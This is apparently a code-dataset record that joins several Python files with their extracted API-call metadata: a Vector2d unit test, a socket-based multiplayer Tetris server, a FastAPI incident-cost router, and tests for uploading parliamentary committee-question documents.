nanVec = Vector2d.NAN
self.assertFalse(nanVec.is_finite())
self.assertTrue(math.isnan(nanVec.x()))
self.assertTrue(math.isnan(nanVec.y()))
nanVec.correct()
self.assertEqual(Vector2d.ZERO, nanVec)
self.assertTrue(nanVec.is_finite())
nanVecF = Vector2f.NAN
self.assertFalse(nanVecF.is_finite())
self.assertTrue(math.isnan(nanVecF.x()))
self.assertTrue(math.isnan(nanVecF.y()))
nanVecF.correct()
self.assertEqual(Vector2f.ZERO, nanVecF)
self.assertTrue(nanVecF.is_finite())
if __name__ == '__main__':
unittest.main()
| [
"math.sqrt",
"ignition.math.Vector2d",
"ignition.math.Vector2d.ZERO.squared_length",
"unittest.main",
"ignition.math.Vector2d.ZERO.equal",
"ignition.math.Vector2d.ONE.length",
"ignition.math.Vector2d.ZERO.length",
"ignition.math.Vector2d.ONE.squared_length"
]
| [((9317, 9332), 'unittest.main', 'unittest.main', ([], {}), '()\n', (9330, 9332), False, 'import unittest\n'), ((786, 796), 'ignition.math.Vector2d', 'Vector2d', ([], {}), '()\n', (794, 796), False, 'from ignition.math import Vector2d\n'), ((898, 912), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(0)'], {}), '(1, 0)\n', (906, 912), False, 'from ignition.math import Vector2d\n'), ((1003, 1016), 'ignition.math.Vector2d', 'Vector2d', (['vec'], {}), '(vec)\n', (1011, 1016), False, 'from ignition.math import Vector2d\n'), ((1161, 1171), 'ignition.math.Vector2d', 'Vector2d', ([], {}), '()\n', (1169, 1171), False, 'from ignition.math import Vector2d\n'), ((1252, 1266), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(2)'], {}), '(1, 2)\n', (1260, 1266), False, 'from ignition.math import Vector2d\n'), ((1689, 1703), 'ignition.math.Vector2d', 'Vector2d', (['(6)', '(7)'], {}), '(6, 7)\n', (1697, 1703), False, 'from ignition.math import Vector2d\n'), ((1876, 1890), 'ignition.math.Vector2d', 'Vector2d', (['(5)', '(6)'], {}), '(5, 6)\n', (1884, 1890), False, 'from ignition.math import Vector2d\n'), ((2089, 2103), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(6)'], {}), '(1, 6)\n', (2097, 2103), False, 'from ignition.math import Vector2d\n'), ((2325, 2339), 'ignition.math.Vector2d', 'Vector2d', (['(2)', '(3)'], {}), '(2, 3)\n', (2333, 2339), False, 'from ignition.math import Vector2d\n'), ((2771, 2785), 'ignition.math.Vector2d', 'Vector2d', (['(2)', '(4)'], {}), '(2, 4)\n', (2779, 2785), False, 'from ignition.math import Vector2d\n'), ((3156, 3174), 'ignition.math.Vector2d', 'Vector2d', (['(0.1)', '(0.2)'], {}), '(0.1, 0.2)\n', (3164, 3174), False, 'from ignition.math import Vector2d\n'), ((3190, 3208), 'ignition.math.Vector2d', 'Vector2d', (['(0.3)', '(0.5)'], {}), '(0.3, 0.5)\n', (3198, 3208), False, 'from ignition.math import Vector2d\n'), ((3224, 3242), 'ignition.math.Vector2d', 'Vector2d', (['(0.4)', '(0.2)'], {}), '(0.4, 0.2)\n', (3232, 3242), False, 'from ignition.math import Vector2d\n'), ((3542, 3560), 'ignition.math.Vector2d', 'Vector2d', (['(0.3)', '(0.5)'], {}), '(0.3, 0.5)\n', (3550, 3560), False, 'from ignition.math import Vector2d\n'), ((3576, 3594), 'ignition.math.Vector2d', 'Vector2d', (['(0.1)', '(0.2)'], {}), '(0.1, 0.2)\n', (3584, 3594), False, 'from ignition.math import Vector2d\n'), ((3610, 3629), 'ignition.math.Vector2d', 'Vector2d', (['(0.05)', '(0.1)'], {}), '(0.05, 0.1)\n', (3618, 3629), False, 'from ignition.math import Vector2d\n'), ((4344, 4358), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(2)'], {}), '(1, 2)\n', (4352, 4358), False, 'from ignition.math import Vector2d\n'), ((4723, 4739), 'ignition.math.Vector2d', 'Vector2d', (['(10)', '(-2)'], {}), '(10, -2)\n', (4731, 4739), False, 'from ignition.math import Vector2d\n'), ((5014, 5029), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(-2)'], {}), '(1, -2)\n', (5022, 5029), False, 'from ignition.math import Vector2d\n'), ((5324, 5342), 'ignition.math.Vector2d', 'Vector2d', (['(0.1)', '(0.2)'], {}), '(0.1, 0.2)\n', (5332, 5342), False, 'from ignition.math import Vector2d\n'), ((5358, 5376), 'ignition.math.Vector2d', 'Vector2d', (['(1.1)', '(2.2)'], {}), '(1.1, 2.2)\n', (5366, 5376), False, 'from ignition.math import Vector2d\n'), ((5821, 5835), 'ignition.math.Vector2d', 'Vector2d', (['vec1'], {}), '(vec1)\n', (5829, 5835), False, 'from ignition.math import Vector2d\n'), ((6209, 6227), 'ignition.math.Vector2d', 'Vector2d', (['(0.1)', '(0.2)'], {}), '(0.1, 0.2)\n', (6217, 6227), False, 'from ignition.math import Vector2d\n'), ((6243, 6261), 'ignition.math.Vector2d', 'Vector2d', (['(1.1)', '(2.2)'], {}), '(1.1, 2.2)\n', (6251, 6261), False, 'from ignition.math import Vector2d\n'), ((6725, 6739), 'ignition.math.Vector2d', 'Vector2d', (['vec1'], {}), '(vec1)\n', (6733, 6739), False, 'from ignition.math import Vector2d\n'), ((7122, 7141), 'ignition.math.Vector2d', 'Vector2d', (['(0.1)', '(-4.2)'], {}), '(0.1, -4.2)\n', (7130, 7141), False, 'from ignition.math import Vector2d\n'), ((7758, 7779), 'ignition.math.Vector2d', 'Vector2d', (['(0.25)', '(-10.5)'], {}), '(0.25, -10.5)\n', (7766, 7779), False, 'from ignition.math import Vector2d\n'), ((8371, 8390), 'ignition.math.Vector2d', 'Vector2d', (['(0.1)', '(-4.2)'], {}), '(0.1, -4.2)\n', (8379, 8390), False, 'from ignition.math import Vector2d\n'), ((8558, 8572), 'ignition.math.Vector2d', 'Vector2d', (['(3)', '(4)'], {}), '(3, 4)\n', (8566, 8572), False, 'from ignition.math import Vector2d\n'), ((1792, 1806), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(2)'], {}), '(1, 2)\n', (1800, 1806), False, 'from ignition.math import Vector2d\n'), ((1983, 1997), 'ignition.math.Vector2d', 'Vector2d', (['(2)', '(4)'], {}), '(2, 4)\n', (1991, 1997), False, 'from ignition.math import Vector2d\n'), ((2220, 2234), 'ignition.math.Vector2d', 'Vector2d', (['(2)', '(3)'], {}), '(2, 3)\n', (2228, 2234), False, 'from ignition.math import Vector2d\n'), ((2664, 2678), 'ignition.math.Vector2d', 'Vector2d', (['(2)', '(4)'], {}), '(2, 4)\n', (2672, 2678), False, 'from ignition.math import Vector2d\n'), ((3401, 3419), 'ignition.math.Vector2d', 'Vector2d', (['(0.3)', '(0.5)'], {}), '(0.3, 0.5)\n', (3409, 3419), False, 'from ignition.math import Vector2d\n'), ((3482, 3500), 'ignition.math.Vector2d', 'Vector2d', (['(0.4)', '(0.5)'], {}), '(0.4, 0.5)\n', (3490, 3500), False, 'from ignition.math import Vector2d\n'), ((3789, 3807), 'ignition.math.Vector2d', 'Vector2d', (['(0.1)', '(0.2)'], {}), '(0.1, 0.2)\n', (3797, 3807), False, 'from ignition.math import Vector2d\n'), ((3870, 3889), 'ignition.math.Vector2d', 'Vector2d', (['(0.05)', '(0.1)'], {}), '(0.05, 0.1)\n', (3878, 3889), False, 'from ignition.math import Vector2d\n'), ((4008, 4048), 'ignition.math.Vector2d.ZERO.equal', 'Vector2d.ZERO.equal', (['Vector2d.ONE', '(1e-06)'], {}), '(Vector2d.ONE, 1e-06)\n', (4027, 4048), False, 'from ignition.math import Vector2d\n'), ((4074, 4114), 'ignition.math.Vector2d.ZERO.equal', 'Vector2d.ZERO.equal', (['Vector2d.ONE', '(0.001)'], {}), '(Vector2d.ONE, 0.001)\n', (4093, 4114), False, 'from ignition.math import Vector2d\n'), ((4140, 4178), 'ignition.math.Vector2d.ZERO.equal', 'Vector2d.ZERO.equal', (['Vector2d.ONE', '(0.1)'], {}), '(Vector2d.ONE, 0.1)\n', (4159, 4178), False, 'from ignition.math import Vector2d\n'), ((4205, 4241), 'ignition.math.Vector2d.ZERO.equal', 'Vector2d.ZERO.equal', (['Vector2d.ONE', '(1)'], {}), '(Vector2d.ONE, 1)\n', (4224, 4241), False, 'from ignition.math import Vector2d\n'), ((4267, 4305), 'ignition.math.Vector2d.ZERO.equal', 'Vector2d.ZERO.equal', (['Vector2d.ONE', '(1.1)'], {}), '(Vector2d.ONE, 1.1)\n', (4286, 4305), False, 'from ignition.math import Vector2d\n'), ((4848, 4862), 'ignition.math.Vector2d', 'Vector2d', (['(0)', '(0)'], {}), '(0, 0)\n', (4856, 4862), False, 'from ignition.math import Vector2d\n'), ((4901, 4916), 'ignition.math.Vector2d', 'Vector2d', (['(0)', '(-1)'], {}), '(0, -1)\n', (4909, 4916), False, 'from ignition.math import Vector2d\n'), ((4955, 4971), 'ignition.math.Vector2d', 'Vector2d', (['(10)', '(-2)'], {}), '(10, -2)\n', (4963, 4971), False, 'from ignition.math import Vector2d\n'), ((5464, 5482), 'ignition.math.Vector2d', 'Vector2d', (['(1.2)', '(2.4)'], {}), '(1.2, 2.4)\n', (5472, 5482), False, 'from ignition.math import Vector2d\n'), ((5521, 5539), 'ignition.math.Vector2d', 'Vector2d', (['(1.2)', '(2.4)'], {}), '(1.2, 2.4)\n', (5529, 5539), False, 'from ignition.math import Vector2d\n'), ((6057, 6075), 'ignition.math.Vector2d', 'Vector2d', (['(2.6)', '(2.7)'], {}), '(2.6, 2.7)\n', (6065, 6075), False, 'from ignition.math import Vector2d\n'), ((6149, 6167), 'ignition.math.Vector2d', 'Vector2d', (['(2.6)', '(2.7)'], {}), '(2.6, 2.7)\n', (6157, 6167), False, 'from ignition.math import Vector2d\n'), ((6349, 6367), 'ignition.math.Vector2d', 'Vector2d', (['(1.0)', '(2.0)'], {}), '(1.0, 2.0)\n', (6357, 6367), False, 'from ignition.math import Vector2d\n'), ((6406, 6424), 'ignition.math.Vector2d', 'Vector2d', (['(1.0)', '(2.0)'], {}), '(1.0, 2.0)\n', (6414, 6424), False, 'from ignition.math import Vector2d\n'), ((7197, 7216), 'ignition.math.Vector2d', 'Vector2d', (['(0.2)', '(-8.4)'], {}), '(0.2, -8.4)\n', (7205, 7216), False, 'from ignition.math import Vector2d\n'), ((7270, 7290), 'ignition.math.Vector2d', 'Vector2d', (['(0.8)', '(-33.6)'], {}), '(0.8, -33.6)\n', (7278, 7290), False, 'from ignition.math import Vector2d\n'), ((7930, 7950), 'ignition.math.Vector2d', 'Vector2d', (['(0.01)', '(0.25)'], {}), '(0.01, 0.25)\n', (7938, 7950), False, 'from ignition.math import Vector2d\n'), ((8033, 8055), 'ignition.math.Vector2d.ZERO.length', 'Vector2d.ZERO.length', ([], {}), '()\n', (8053, 8055), False, 'from ignition.math import Vector2d\n'), ((8093, 8123), 'ignition.math.Vector2d.ZERO.squared_length', 'Vector2d.ZERO.squared_length', ([], {}), '()\n', (8121, 8123), False, 'from ignition.math import Vector2d\n'), ((8183, 8204), 'ignition.math.Vector2d.ONE.length', 'Vector2d.ONE.length', ([], {}), '()\n', (8202, 8204), False, 'from ignition.math import Vector2d\n'), ((8237, 8249), 'math.sqrt', 'math.sqrt', (['(2)'], {}), '(2)\n', (8246, 8249), False, 'import math\n'), ((8295, 8324), 'ignition.math.Vector2d.ONE.squared_length', 'Vector2d.ONE.squared_length', ([], {}), '()\n', (8322, 8324), False, 'from ignition.math import Vector2d\n'), ((1336, 1346), 'ignition.math.Vector2d', 'Vector2d', ([], {}), '()\n', (1344, 1346), False, 'from ignition.math import Vector2d\n'), ((1436, 1464), 'ignition.math.Vector2d', 'Vector2d', (['(0.447214)', '(0.894427)'], {}), '(0.447214, 0.894427)\n', (1444, 1464), False, 'from ignition.math import Vector2d\n'), ((1540, 1554), 'ignition.math.Vector2d', 'Vector2d', (['(4)', '(5)'], {}), '(4, 5)\n', (1548, 1554), False, 'from ignition.math import Vector2d\n'), ((1638, 1652), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(2)'], {}), '(1, 2)\n', (1646, 1652), False, 'from ignition.math import Vector2d\n'), ((1736, 1750), 'ignition.math.Vector2d', 'Vector2d', (['(6)', '(7)'], {}), '(6, 7)\n', (1744, 1750), False, 'from ignition.math import Vector2d\n'), ((1839, 1853), 'ignition.math.Vector2d', 'Vector2d', (['(7)', '(9)'], {}), '(7, 9)\n', (1847, 1853), False, 'from ignition.math import Vector2d\n'), ((1923, 1939), 'ignition.math.Vector2d', 'Vector2d', (['(12)', '(15)'], {}), '(12, 15)\n', (1931, 1939), False, 'from ignition.math import Vector2d\n'), ((2030, 2046), 'ignition.math.Vector2d', 'Vector2d', (['(10)', '(11)'], {}), '(10, 11)\n', (2038, 2046), False, 'from ignition.math import Vector2d\n'), ((2136, 2151), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(-2)'], {}), '(1, -2)\n', (2144, 2151), False, 'from ignition.math import Vector2d\n'), ((2267, 2281), 'ignition.math.Vector2d', 'Vector2d', (['(5)', '(2)'], {}), '(5, 2)\n', (2275, 2281), False, 'from ignition.math import Vector2d\n'), ((2372, 2386), 'ignition.math.Vector2d', 'Vector2d', (['(5)', '(2)'], {}), '(5, 2)\n', (2380, 2386), False, 'from ignition.math import Vector2d\n'), ((2493, 2507), 'ignition.math.Vector2d', 'Vector2d', (['(5)', '(3)'], {}), '(5, 3)\n', (2501, 2507), False, 'from ignition.math import Vector2d\n'), ((2585, 2599), 'ignition.math.Vector2d', 'Vector2d', (['(5)', '(3)'], {}), '(5, 3)\n', (2593, 2599), False, 'from ignition.math import Vector2d\n'), ((2711, 2727), 'ignition.math.Vector2d', 'Vector2d', (['(20)', '(24)'], {}), '(20, 24)\n', (2719, 2727), False, 'from ignition.math import Vector2d\n'), ((2818, 2834), 'ignition.math.Vector2d', 'Vector2d', (['(20)', '(24)'], {}), '(20, 24)\n', (2826, 2834), False, 'from ignition.math import Vector2d\n'), ((2937, 2953), 'ignition.math.Vector2d', 'Vector2d', (['(20)', '(12)'], {}), '(20, 12)\n', (2945, 2953), False, 'from ignition.math import Vector2d\n'), ((3031, 3047), 'ignition.math.Vector2d', 'Vector2d', (['(20)', '(12)'], {}), '(20, 12)\n', (3039, 3047), False, 'from ignition.math import Vector2d\n'), ((4396, 4410), 'ignition.math.Vector2d', 'Vector2d', (['(3)', '(4)'], {}), '(3, 4)\n', (4404, 4410), False, 'from ignition.math import Vector2d\n'), ((4456, 4470), 'ignition.math.Vector2d', 'Vector2d', (['(0)', '(0)'], {}), '(0, 0)\n', (4464, 4470), False, 'from ignition.math import Vector2d\n'), ((4515, 4529), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(0)'], {}), '(1, 0)\n', (4523, 4529), False, 'from ignition.math import Vector2d\n'), ((4574, 4588), 'ignition.math.Vector2d', 'Vector2d', (['(0)', '(1)'], {}), '(0, 1)\n', (4582, 4588), False, 'from ignition.math import Vector2d\n'), ((5072, 5086), 'ignition.math.Vector2d', 'Vector2d', (['(3)', '(4)'], {}), '(3, 4)\n', (5080, 5086), False, 'from ignition.math import Vector2d\n'), ((5136, 5150), 'ignition.math.Vector2d', 'Vector2d', (['(0)', '(0)'], {}), '(0, 0)\n', (5144, 5150), False, 'from ignition.math import Vector2d\n'), ((5199, 5213), 'ignition.math.Vector2d', 'Vector2d', (['(1)', '(0)'], {}), '(1, 0)\n', (5207, 5213), False, 'from ignition.math import Vector2d\n'), ((5262, 5276), 'ignition.math.Vector2d', 'Vector2d', (['(0)', '(1)'], {}), '(0, 1)\n', (5270, 5276), False, 'from ignition.math import Vector2d\n'), ((6967, 6985), 'ignition.math.Vector2d', 'Vector2d', (['(2.4)', '(2.3)'], {}), '(2.4, 2.3)\n', (6975, 6985), False, 'from ignition.math import Vector2d\n'), ((7060, 7078), 'ignition.math.Vector2d', 'Vector2d', (['(2.4)', '(2.3)'], {}), '(2.4, 2.3)\n', (7068, 7078), False, 'from ignition.math import Vector2d\n')] |
import pickle
import socket
import _thread
from scripts.multiplayer import game, board, tetriminos
server = "192.168.29.144"
port = 5555
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind((server, port))
except socket.error as e:
print(e)
s.listen()
print("Waiting for connection")
connected = set()
games = {}
idCount = 0
def threaded_client(conn, p, gameId):
global idCount
conn.send(str.encode(str(p)))
reply = ""
while True:
try:
data = conn.recv(4096).decode()
if gameId in games:
game = games[gameId]
if not data:
break
else:
game.update(p, data)
reply = game
conn.sendall(pickle.dumps(reply))
else:
break
except:
break
print("Lost Connection!")
try:
del games[gameId]
print("Closing Game", gameId)
except:
pass
idCount -= 1
conn.close()
while True:
conn, addr = s.accept()
print("Connected to: ", addr)
idCount += 1
p = 0
game_id = (idCount - 1) // 2
if idCount % 2 == 1:
games[game_id] = game.Game((0, 0, 0), None, board)
else:
games[game_id].ready = True
p = 1
_thread.start_new_thread(threaded_client, (conn, p, game_id))
| [
"scripts.multiplayer.game.update",
"socket.socket",
"pickle.dumps",
"scripts.multiplayer.game.Game",
"_thread.start_new_thread"
]
| [((143, 192), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (156, 192), False, 'import socket\n'), ((1335, 1396), '_thread.start_new_thread', '_thread.start_new_thread', (['threaded_client', '(conn, p, game_id)'], {}), '(threaded_client, (conn, p, game_id))\n', (1359, 1396), False, 'import _thread\n'), ((1236, 1269), 'scripts.multiplayer.game.Game', 'game.Game', (['(0, 0, 0)', 'None', 'board'], {}), '((0, 0, 0), None, board)\n', (1245, 1269), False, 'from scripts.multiplayer import game, board, tetriminos\n'), ((701, 721), 'scripts.multiplayer.game.update', 'game.update', (['p', 'data'], {}), '(p, data)\n', (712, 721), False, 'from scripts.multiplayer import game, board, tetriminos\n'), ((789, 808), 'pickle.dumps', 'pickle.dumps', (['reply'], {}), '(reply)\n', (801, 808), False, 'import pickle\n')] |
from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.orm import Session
from dispatch.database.core import get_db
from dispatch.database.service import common_parameters, search_filter_sort_paginate
from dispatch.auth.permissions import SensitiveProjectActionPermission, PermissionsDependency
from .models import (
IncidentCostCreate,
IncidentCostPagination,
IncidentCostRead,
IncidentCostUpdate,
)
from .service import create, delete, get, update
router = APIRouter()
@router.get("", response_model=IncidentCostPagination)
def get_incident_costs(*, common: dict = Depends(common_parameters)):
"""
Get all incident costs, or only those matching a given search term.
"""
return search_filter_sort_paginate(model="IncidentCost", **common)
@router.get("/{incident_cost_id}", response_model=IncidentCostRead)
def get_incident_cost(*, db_session: Session = Depends(get_db), incident_cost_id: int):
"""
Get an incident cost by id.
"""
incident_cost = get(db_session=db_session, incident_cost_id=incident_cost_id)
if not incident_cost:
raise HTTPException(status_code=404, detail="An incident cost with this id does not exist.")
return incident_cost
@router.post(
"",
response_model=IncidentCostRead,
dependencies=[Depends(PermissionsDependency([SensitiveProjectActionPermission]))],
)
def create_incident_cost(
*, db_session: Session = Depends(get_db), incident_cost_in: IncidentCostCreate
):
"""
Create an incident cost.
"""
incident_cost = create(db_session=db_session, incident_cost_in=incident_cost_in)
return incident_cost
@router.put(
"/{incident_cost_id}",
response_model=IncidentCostRead,
dependencies=[Depends(PermissionsDependency([SensitiveProjectActionPermission]))],
)
def update_incident_cost(
*,
db_session: Session = Depends(get_db),
incident_cost_id: int,
incident_cost_in: IncidentCostUpdate,
):
"""
Update an incident cost by id.
"""
incident_cost = get(db_session=db_session, incident_cost_id=incident_cost_id)
if not incident_cost:
raise HTTPException(status_code=404, detail="An incident cost with this id does not exist.")
incident_cost = update(
db_session=db_session,
incident_cost=incident_cost,
incident_cost_in=incident_cost_in,
)
return incident_cost
@router.delete(
"/{incident_cost_id}",
dependencies=[Depends(PermissionsDependency([SensitiveProjectActionPermission]))],
)
def delete_incident_cost(*, db_session: Session = Depends(get_db), incident_cost_id: int):
"""
Delete an incident cost, returning only an HTTP 200 OK if successful.
"""
incident_cost = get(db_session=db_session, incident_cost_id=incident_cost_id)
if not incident_cost:
raise HTTPException(status_code=404, detail="An incident cost with this id does not exist.")
delete(db_session=db_session, incident_cost_id=incident_cost_id)
| [
"fastapi.HTTPException",
"fastapi.APIRouter",
"dispatch.auth.permissions.PermissionsDependency",
"dispatch.database.service.search_filter_sort_paginate",
"fastapi.Depends"
]
| [((494, 505), 'fastapi.APIRouter', 'APIRouter', ([], {}), '()\n', (503, 505), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((604, 630), 'fastapi.Depends', 'Depends', (['common_parameters'], {}), '(common_parameters)\n', (611, 630), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((732, 791), 'dispatch.database.service.search_filter_sort_paginate', 'search_filter_sort_paginate', ([], {'model': '"""IncidentCost"""'}), "(model='IncidentCost', **common)\n", (759, 791), False, 'from dispatch.database.service import common_parameters, search_filter_sort_paginate\n'), ((909, 924), 'fastapi.Depends', 'Depends', (['get_db'], {}), '(get_db)\n', (916, 924), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((1437, 1452), 'fastapi.Depends', 'Depends', (['get_db'], {}), '(get_db)\n', (1444, 1452), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((1876, 1891), 'fastapi.Depends', 'Depends', (['get_db'], {}), '(get_db)\n', (1883, 1891), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((2579, 2594), 'fastapi.Depends', 'Depends', (['get_db'], {}), '(get_db)\n', (2586, 2594), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((1120, 1211), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(404)', 'detail': '"""An incident cost with this id does not exist."""'}), "(status_code=404, detail=\n 'An incident cost with this id does not exist.')\n", (1133, 1211), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((2138, 2229), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(404)', 'detail': '"""An incident cost with this id does not exist."""'}), "(status_code=404, detail=\n 'An incident cost with this id does not exist.')\n", (2151, 2229), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((2832, 2923), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(404)', 'detail': '"""An incident cost with this id does not exist."""'}), "(status_code=404, detail=\n 'An incident cost with this id does not exist.')\n", (2845, 2923), False, 'from fastapi import APIRouter, Depends, HTTPException\n'), ((1319, 1376), 'dispatch.auth.permissions.PermissionsDependency', 'PermissionsDependency', (['[SensitiveProjectActionPermission]'], {}), '([SensitiveProjectActionPermission])\n', (1340, 1376), False, 'from dispatch.auth.permissions import SensitiveProjectActionPermission, PermissionsDependency\n'), ((1754, 1811), 'dispatch.auth.permissions.PermissionsDependency', 'PermissionsDependency', (['[SensitiveProjectActionPermission]'], {}), '([SensitiveProjectActionPermission])\n', (1775, 1811), False, 'from dispatch.auth.permissions import SensitiveProjectActionPermission, PermissionsDependency\n'), ((2466, 2523), 'dispatch.auth.permissions.PermissionsDependency', 'PermissionsDependency', (['[SensitiveProjectActionPermission]'], {}), '([SensitiveProjectActionPermission])\n', (2487, 2523), False, 'from dispatch.auth.permissions import SensitiveProjectActionPermission, PermissionsDependency\n')] |
import os
from urllib.parse import urlparse, parse_qs
from builtins import str
from tests import PMGLiveServerTestCase
from pmg.models import db, Committee, CommitteeQuestion
from tests.fixtures import dbfixture, UserData, CommitteeData, MembershipData
from flask import escape
from io import BytesIO
class TestAdminCommitteeQuestions(PMGLiveServerTestCase):
def setUp(self):
super().setUp()
self.fx = dbfixture.data(UserData)
self.fx.setup()
self.user = self.fx.UserData.admin
def tearDown(self):
self.delete_created_objects()
self.fx.teardown()
super().tearDown()
def test_upload_committee_question_document_with_old_format(self):
"""
Upload committee question document (/admin/committee-question/upload)
"""
url = "/admin/committee-question/upload"
data = {}
path = self.get_absolute_file_path(
"../data/committee_questions/RNW190-200303.docx"
)
with open(path, "rb") as f:
data["file"] = (f, "RNW190-200303.docx")
response = self.make_request(
url,
self.user,
data=data,
method="POST",
headers={"Referer": "/somethingelse"},
content_type="multipart/form-data",
)
self.assertEqual(302, response.status_code)
response_url = urlparse(response.location)
response_query = parse_qs(response_url.query)
self.assertIn("id", response_query, "Question ID must be in response query")
created_question_id = int(response_query["id"][0])
response = self.make_request(
"%s?%s" % (response_url.path, response_url.query),
self.user,
follow_redirects=True,
)
self.assertEqual(200, response.status_code)
# Test that the question that was created contains the correct data
question = CommitteeQuestion.query.get(created_question_id)
self.assertEqual(
question.question,
"Whether her Office has initiated the drafting of a Bill that seeks to protect and promote the rights of persons with disabilities; if not, (a) why not and (b) what steps does her Office intend taking in this regard; if so, on what date does she envisage that the Bill will be introduced in the National Assembly?",
)
self.assertEqual(
question.minister.name,
"Minister in The Presidency for Women, Youth and Persons with Disabilities",
)
self.assertEqual(question.asked_by_name, "<NAME>")
self.assertEqual(
question.answer,
"<p>Yes</p><p>(b) The Department is in the process of preparing the drafting of a Bill which will be submitted to Cabinet for approval before it will be tabled in Parliament during the 2021/2022 financial year.</p>",
)
self.assertEqual(question.code, "NW190")
# Delete the question that was created
self.created_objects.append(question)
def test_upload_committee_question_document_with_new_format(self):
"""
Upload committee question document (/admin/committee-question/upload)
"""
url = "/admin/committee-question/upload"
data = {}
path = self.get_absolute_file_path(
"../data/committee_questions/RNW104-2020-02-28.docx"
)
with open(path, "rb") as f:
data["file"] = (f, "RNW104-2020-02-28.docx")
response = self.make_request(
url,
self.user,
data=data,
method="POST",
headers={"Referer": "/admin/committee-question/"},
content_type="multipart/form-data",
)
self.assertEqual(302, response.status_code)
response_url = urlparse(response.location)
response_query = parse_qs(response_url.query)
self.assertIn("id", response_query, "Question ID must be in response query")
created_question_id = int(response_query["id"][0])
response = self.make_request(
"%s?%s" % (response_url.path, response_url.query),
self.user,
follow_redirects=True,
)
self.assertEqual(200, response.status_code)
# Test that the question that was created contains the correct data
question = CommitteeQuestion.query.get(created_question_id)
self.assertEqual(
question.question,
"What (a) is the number of (i) residential properties, (ii) business erven’, (iii) government buildings and (iv) agricultural properties owned by her department in the Lephalale Local Municipality which are (aa) vacant, (bb) occupied and (cc) earmarked for disposal and (b) total amount does her department owe the municipality in outstanding rates and services?",
)
self.assertEqual(
question.minister.name, "Minister of Public Works and Infrastructure",
)
self.assertEqual(question.asked_by_name, "<NAME>")
self.assertEqual(
question.answer,
"<p><strong>The Minister of Public Works and</strong><strong> Infrastructure: </strong></p><ol><li>The Department of Public Works and Infrastructure (DPWI) has informed me that in the Lephalale Local Municipality the Department owns (i) 183 residential properties (ii) one business erven (iii) 132 government buildings and (iv) 5 agricultural properties. DPWI informed me that (aa) 8 land parcels are vacant and (bb) only one property is unutilised. </li></ol><p>(cc) DPWI has not earmarked any properties for disposal in the Lephalale Local Municipality.</p><ol><li>In August 2019 the Department started a Government Debt Project engaging directly with municipalities and Eskom to verify and reconcile accounts and the project. DPWI, on behalf of client departments, owed the Lephalale Local Municipality, as per accounts received on 17 February 2020, R 334,989.69 which relates current consumption. </li></ol>",
)
self.assertEqual(question.code, "NW104")
# Delete the question that was created
self.created_objects.append(question)
def test_upload_committee_question_document_with_navigable_string_error(self):
"""
Upload committee question document (/admin/committee-question/upload)
"""
url = "/admin/committee-question/upload"
data = {}
path = self.get_absolute_file_path(
"../data/committee_questions/RNW1153-200619.docx"
)
with open(path, "rb") as f:
data["file"] = (f, "RNW1153-200619.docx")
response = self.make_request(
url,
self.user,
data=data,
method="POST",
headers={"Referer": "/admin/committee-question/"},
content_type="multipart/form-data",
)
self.assertEqual(302, response.status_code)
response_url = urlparse(response.location)
response_query = parse_qs(response_url.query)
self.assertIn("id", response_query, "Question ID must be in response query")
created_question_id = int(response_query["id"][0])
response = self.make_request(
"%s?%s" % (response_url.path, response_url.query),
self.user,
follow_redirects=True,
)
self.assertEqual(200, response.status_code)
# Test that the question that was created contains the correct data
question = CommitteeQuestion.query.get(created_question_id)
self.assertIn(
"(1)Whether, with reference to her reply to question 937 on 4 June 2020",
question.question,
)
self.assertEqual(
question.minister.name,
"Minister in The Presidency for Women, Youth and Persons with Disabilities",
)
self.assertEqual(question.asked_by_name, "<NAME>")
self.assertIn(
"There were no deviations from the standard supply chain management procedures",
question.answer,
)
self.assertEqual(question.code, "NW1153")
# Delete the question that was created
self.created_objects.append(question)
def get_absolute_file_path(self, relative_path):
dir_name = os.path.dirname(__file__)
return os.path.join(dir_name, relative_path)
| [
"urllib.parse.urlparse",
"pmg.models.CommitteeQuestion.query.get",
"os.path.join",
"tests.fixtures.dbfixture.data",
"urllib.parse.parse_qs",
"os.path.dirname"
]
| [((425, 449), 'tests.fixtures.dbfixture.data', 'dbfixture.data', (['UserData'], {}), '(UserData)\n', (439, 449), False, 'from tests.fixtures import dbfixture, UserData, CommitteeData, MembershipData\n'), ((1424, 1451), 'urllib.parse.urlparse', 'urlparse', (['response.location'], {}), '(response.location)\n', (1432, 1451), False, 'from urllib.parse import urlparse, parse_qs\n'), ((1477, 1505), 'urllib.parse.parse_qs', 'parse_qs', (['response_url.query'], {}), '(response_url.query)\n', (1485, 1505), False, 'from urllib.parse import urlparse, parse_qs\n'), ((1969, 2017), 'pmg.models.CommitteeQuestion.query.get', 'CommitteeQuestion.query.get', (['created_question_id'], {}), '(created_question_id)\n', (1996, 2017), False, 'from pmg.models import db, Committee, CommitteeQuestion\n'), ((3881, 3908), 'urllib.parse.urlparse', 'urlparse', (['response.location'], {}), '(response.location)\n', (3889, 3908), False, 'from urllib.parse import urlparse, parse_qs\n'), ((3934, 3962), 'urllib.parse.parse_qs', 'parse_qs', (['response_url.query'], {}), '(response_url.query)\n', (3942, 3962), False, 'from urllib.parse import urlparse, parse_qs\n'), ((4425, 4473), 